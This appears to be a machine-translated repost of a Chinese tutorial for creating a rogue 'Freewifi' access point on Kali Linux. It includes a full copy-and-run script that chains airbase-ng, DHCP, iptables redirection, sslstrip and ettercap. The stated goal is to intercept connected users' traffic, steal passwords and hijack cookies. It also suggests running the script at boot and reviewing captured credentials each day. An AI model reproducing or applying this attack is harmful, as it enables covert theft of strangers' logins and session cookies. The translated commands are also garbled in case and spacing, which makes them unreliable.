Kali-linux the way to build a network bridge with Hostapd+bridge-utils to create a log of WiFi hotspots, interested in looking at different:
Create a WiFi hotspot (AP) using HOSTAPD under Kali-linux
One way to do this is to use Airbase-ng + DHCPD to create a virtual WiFi hotspot, use Sslstrip+ettercap for man-in-the-middle attacks, sniff users for Internet messages, and hijack cookie!
The required software is as follows; Kali-linux are already self-contained, other systems can be installed on their own:
Aircrack-ng Kit #用来发送数据
Isc-dhcp-server #简单的dhcp服务器
SSLstrip #突破ssl加密
Ettercap #嗅探劫持
leaf/etc/dhcp/dhcpd.conf Edit the DHCP server configuration file, modify the following:
authoritative;
Default-lease-time 700;
Max-lease-time 8000;
Subnet 10.0.0.0 netmask 255.255.255.0 {
Option routers 10.0.0.1;
Option Subnet-mask 255.255.255.0;
Option Domain-name "Freewifi";
Option Domain-name-servers 10.0.0.1;
Range 10.0.0.10 10.0.0.100;
}
Then activate the NIC to listening mode:
Airmon-ng Start Wlan0
AIRBASE-NG-E Freewifi-c 6 Mon0
At this point the virtual WiFi signal has been sent out, if there is an error:
Error:got Channel-1, expected a value > 0.
Execute the following command:
Airmon-ng Stop Mon0
Ifconfig wlan0 Down
Iwconfig wlan0 Mode Monitor
Ifconfig wlan0 up
Then start again from activating the NIC to listening mode.
Then execute the following command:
Ifconfig at0 up
Ifconfig at0 10.0.0.1 netmask 255.255.255.0
Ifconfig At0 MTU 1400
Route add-net 10.0.0.0 netmask 255.255.255.0 GW 10.0.0.1
Iptables--flush
Iptables--table Nat--flush
Iptables--delete-chain
Iptables--table Nat--delete-chain
Echo 1 >/proc/sys/net/ipv4/ip_forward
Iptables-t nat-a prerouting-p udp-j DNAT--to 192.168.1.1
Iptables-p FORWARD ACCEPT
Iptables--append FORWARD--in-interface at0-j ACCEPT
Iptables--table Nat--append postrouting--out-interface eth0-j Masquerade
Iptables-t nat-a prerouting-p tcp--destination-port 80-j REDIRECT--to-port 10000
Dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid At0
/etc/init.d/isc-dhcp-server start
The virtual Wifir hotspot was created successfully, followed by sniffing deception fishing:
SSLSTRIP-FPK 10000
Ettercap-tpuqi At0
Then just wait for the fish to bite!
Mobile phone test on the next, NetEase Mailbox direct plaintext Password:
Baidu uses encryption:
Write a script, modify it to your own settings each time the execution is OK:
Copy the following code, save as "fake_a_ap.sh", and then chmod +x fake_a_ap.sh &&./fake_a_ap.sh
#!/bin/sh
echo "is about to create a WiFi hotspot, make sure the DHCPD.CONF is configured!" "&
Sleep 5
Ifconfig wlan0 down #wlan0修改成你的网卡
Iwconfig wlan0 Mode Monitor
Ifconfig wlan0 up
Airmon-ng Start Wlan0 &
Sleep 5
AIRBASE-NG-E freewifi-c 6 Mon0 & #修改成自己的热点名称和信道
Sleep 5
Ifconfig at0 up
Ifconfig at0 10.0.0.1 netmask 255.255.255.0
Ifconfig At0 MTU 1400
Route add-net 10.0.0.0 netmask 255.255.255.0 GW 10.0.0.1
Iptables--flush && iptables--table nat--flush && iptables--table nat--flush && iptables--tab Le Nat--delete-chain &
Echo 1 >/proc/sys/net/ipv4/ip_forward
Iptables-t nat-a prerouting-p udp-j DNAT--to 192.168.1.1
Iptables-p FORWARD ACCEPT
Iptables--append FORWARD--in-interface at0-j ACCEPT
Iptables--table Nat--append postrouting--out-interface eth0-j Masquerade
Iptables-t nat-a prerouting-p tcp--destination-port 80-j REDIRECT--to-port 10000
Dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid At0
Sleep 2
/etc/init.d/isc-dhcp-server Start &
Sleep 5
SSLSTRIP-FPK 10000 &
ETTERCAP-PUTQI At0
Of course, it can be more lewd! Simply modify the Ettercap parameter of the script: set to save the packet locally, and then add the script to the "Launch application" or add a cron task to boot it with the system, And then no more: every day before bedtime open the packet check inside the USERNAME,PASSWD,COOKIE,,ETC,,,,
This article turns from http://xiao106347.blog.163.com/blog/static/215992078201463597381/,
Create a fishing WiFi hotspot under Kali-linux